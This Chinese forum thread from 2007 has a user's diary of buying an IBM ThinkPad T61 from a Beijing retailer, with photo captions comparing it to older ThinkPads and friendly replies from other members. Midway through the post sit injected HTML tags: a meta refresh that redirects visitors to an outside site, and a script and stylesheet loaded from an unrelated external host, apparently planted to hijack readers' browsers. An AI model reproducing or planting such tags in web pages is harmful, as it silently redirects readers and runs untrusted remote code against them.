开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 貴賓申請(加入黑社會,購買手記,自拍小黑玉照圖片)

先是貴賓申請
按照格式申請貴賓
请按照以下格式
1:购机时间20071027
2:购机型号序列号A24 S/N:L3-A1592

購買手記
說起購買手記,其實自己本來爲了那700翔幣,真的打算買本的當天從出家門就開始拍照片,一直拍到回家.給大家來一個視覺大餐的.
但是由於爸爸媽媽游香港,把DC拿走了不說,昨天的北京天空還灰蒙蒙的令人很不舒服,所以拍照片的事情就儅我偷懶,沒拍.一會兒大家湊和看看我回家之後和今天在公司用N70拍攝的小黑吧.

關於購買小黑,有很多很多故事要不得不提一下.
首先,購買的原因.其實説起購買的原因,很簡單,就是因爲公司把有綫網絡的所有端口給封了.因爲内部的計算機受到了很嚴重的病毒干擾,導致全公司的計算機差點癱瘓不能幹活.而公司很多同事都有筆記本,所以公司現在鼓勵大家帶本子用WiFi上網.所以我想買個筆記本.這個是主要原因.
其次,是另外一個在現在説來並不算原因的原因了.因爲我最愛的一個女孩.她現在在英國上學.她用的是IBM T43,行貨.在她走之前,她告訴我,她想讓我給她換成T6X系列帶到國外去,雖然當時是開玩笑的,但是我也答應她了.要給她換個T61讓她用.這也是其中一個讓我購買小黑的不算原因的原因了.前兩天我決定買這個筆記本之後,在網上踫到她,我還特意告訴她,明年回國的時候,讓她把T43拿過來,我把T61讓她帶走,畢竟是我答應過她的.但是不知道她會不會來找我換過去。

說完了購買原因,再來説說我爲什麽會選擇小黑.
其實和絕大部分的人一樣,IBM的小黑在我的眼中就代表著筆記本.曾經聼過一句話:“這個世界上筆記本有兩個品牌,一個是IBM,另一個是其他.”其它的品牌根本就沒想過.雖然小黑的價格很貴,但是她的品質,她的做工,還有那一如既往的低調的黑色,都是那麽的迷人,那麽的令人嚮往.用5個字來總結,就是"低調的奢華."貌似這個詞以前看過誰說過,所以不是我原創.我的朋友很多人都勸我說沒必要買小黑,隨便買個華碩之類的本子也都相當的不錯,價格也便宜,但是都被我一句"除了IBM剩下的都不考慮"給回絕掉了.因爲我真的太喜歡這個ThingPad的名字了.
下面就來説說買本當天的感受.
上午9點半驅車從馬連道出發,到達朝陽門的天辰大廈大概是10點20分左右.直接到1204房間,發現裏面沒有我想象的那麽火爆.只有一桌兩位大叔在驗機器.是一個很開朗的兄弟在給他們弄.並且他還很熱情地和我打招呼.之後是一個MM出來接待我的.我告訴她要A24.她把我安排到旁邊的小桌坐下,讓我稍等10分鐘,去拿機器了.
等了大概不到10分鐘,就把我的本本抱出來了.看看外觀,沒什麽問題,直接Ghost系統.這裡不再贅述.系統裝好之後,看了看屏幕,命好,沒有坏點.也沒那麽多事兒,直接挑選A餐的一些禮品,然後就收拾機器走人了.全程大概耗時不到50分鐘.
在購機過程中,陸陸續續來了3撥人.還好我來的早,買到了A24,後來的一個兄弟到的時候,A24已經售罄了.另外得到消息,昨天A18也沒了.看來最近股市帶動經濟,大家手裏都富裕啊.裝系統的過程中,一直和那個裝機的MM聊天,陪我一起去的兄弟說著姑娘説話太有意思了.呵呵,是挺逗的.她拿出來一塊3M的屏幕布幫我擦得時候,我曾經打算拿走,結果未遂,被扣上了盜竊的大帽子.相當的冤枉.
值得一提的是我把那個OEM的包折價30還給翔意了.因爲我從其它渠道找到了另外一個包.這個包請大家看下面的圖,皮的IBM紅點包,泰格斯代工,据包的原主人說,市場曾經賣到7XX的價格.

下面是一些我用N70拍的圖片,實在是抱歉,手裏面真的沒有DC.只能用N70拍了.請各位海涵.
注:以下所有圖片均為本人實際拍攝,使用Nokia N70拍攝。此帖全部圖片均從Google Picasa網絡相冊鏈接產生,如長時間不能打開,可能由於您的網絡和Google Picasa之間的連接產生了一些未知原因,請嘗試刷新瀏覽器或過一段時間再次查看圖片來解決該問題。
如需轉載,請註明源自翔意數碼論壇www.xynbnb.com。謝謝合作。

IBM T61

IBM T61鍵盤下的貼標

IBM T61蓋子上和鍵盤下的貼標合照

IBM T61的Centrino貼標。不是很清楚。N70的近照功能太差了。

全景小黑左側相貌配小黑鼠

全景小黑右側相貌

小黑倒立的樣子

可以看到蓋子上面的能源之星

指紋識別+鍵盤下面和蓋子上的IBM標誌

光驅全景照

從朋友那裏搶來的IBM皮質紅點包

拉鎖上的小紅點

右下角的ThinkPad貼標。由於是N70拍攝的。所以非常不清楚。請各位湊合看吧

拉鎖上面的IBM標誌為突出的。

包包打開所有的拉鎖之後的樣子。放電腦的那個袋子裏面有下、左、右三面的軟保護條。可拆卸。

下面來一些和其他的本本的合影
這張是公司的T43,同樣為高分屏。

T43的標誌。但是因爲N70的原因,太模糊了。抱歉。

T43和T61的合照,左側為T43,右側為T61

兩個本子並排的合照。左側為T61,右側為T30

T61和T30摞在一起。上側為T30,下側為T61

T61和T30竟然差不多厚度。防滾架惹得禍。上側為T30,下側為T61

T61和T30的蓋子上的IBM貼標。上側為T30,下側為T61

最後再來一張,T61和SONY的一個本本的合影。看起來小黑還是很苗條的。

基本上圖片就放這些吧。希望各位能喜歡。由於拍照的相機和本人的技術原因,如導致有朋友產生了不良反應,本人不承擔任何連帶責任。特此聲明。

+600---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 600

恭喜兄弟了
。。。。。。。。。。
恭喜楼主加入小黑了,呵呵
不错..........
皮书包很沉吧
原帖由 woodbury 于 2007-10-28 21:42 发表
皮书包很沉吧

還不錯。拿起來的質感很好。
楼主大款  把钱都扔在桌子上
还有一个吃个半个的苹果

那天拼300优惠给你加了N次油 最后怎奈有米人出手 不得不小遗憾一下
发现T43确实两边框也不一边宽 左>右
T61不是专利

恭喜一下 有小黑混 希望你那个MM会回来跟你换本子 有个人可以牵挂是多么幸福啊~
原帖由 topman 于 2007-10-29 00:15 发表
楼主大款  把钱都扔在桌子上
还有一个吃个半个的苹果

那天拼300优惠给你加了N次油 最后怎奈有米人出手 不得不小遗憾一下
发现T43确实两边框也不一边宽 左>右
T61不是专利

恭喜一下 有小黑混 希望你 ...

兄弟,謝謝你那天這麽挺我。雖然最後我沒拍下來。
那些錢。。。。是中午吃飯剩下的。
那個蘋果,之所以剩下半個,是因爲它實在太不好吃了

至於那個姑娘。我牽挂她,可是她並不牽挂我。因爲她已經離開我了。這個換本子的事情,不過是我一廂情願罷了。無奈啊
有句話怎麽說來的?人比海里沙,毋用多牽挂。
可見,沒有牽挂是一件多麽美妙的事情~
留名中,楼主是来抢XB的哈
呵呵,lz的感情生活和我很像啊,理解你的心情。lz还真是米多,桌子上乱撒啊
怎么没加分呢.提倡简体中文.
樓上的,不但沒給我加分,你拍中包的那個xb還沒減呢。
LZ公司是卖NOKIA手机的还是?
最新的手记了吧~~~~~
貌似是最新的吧?不知道。。。。
恭喜楼主加入小黑了,呵呵
一看那个包就知道LZ有T43一类的老机器了,还看到了LZ的DELL,和我现在的机器差不多啊
楼主写的不错,俺也想要啊.....
需要大力提倡简体中文。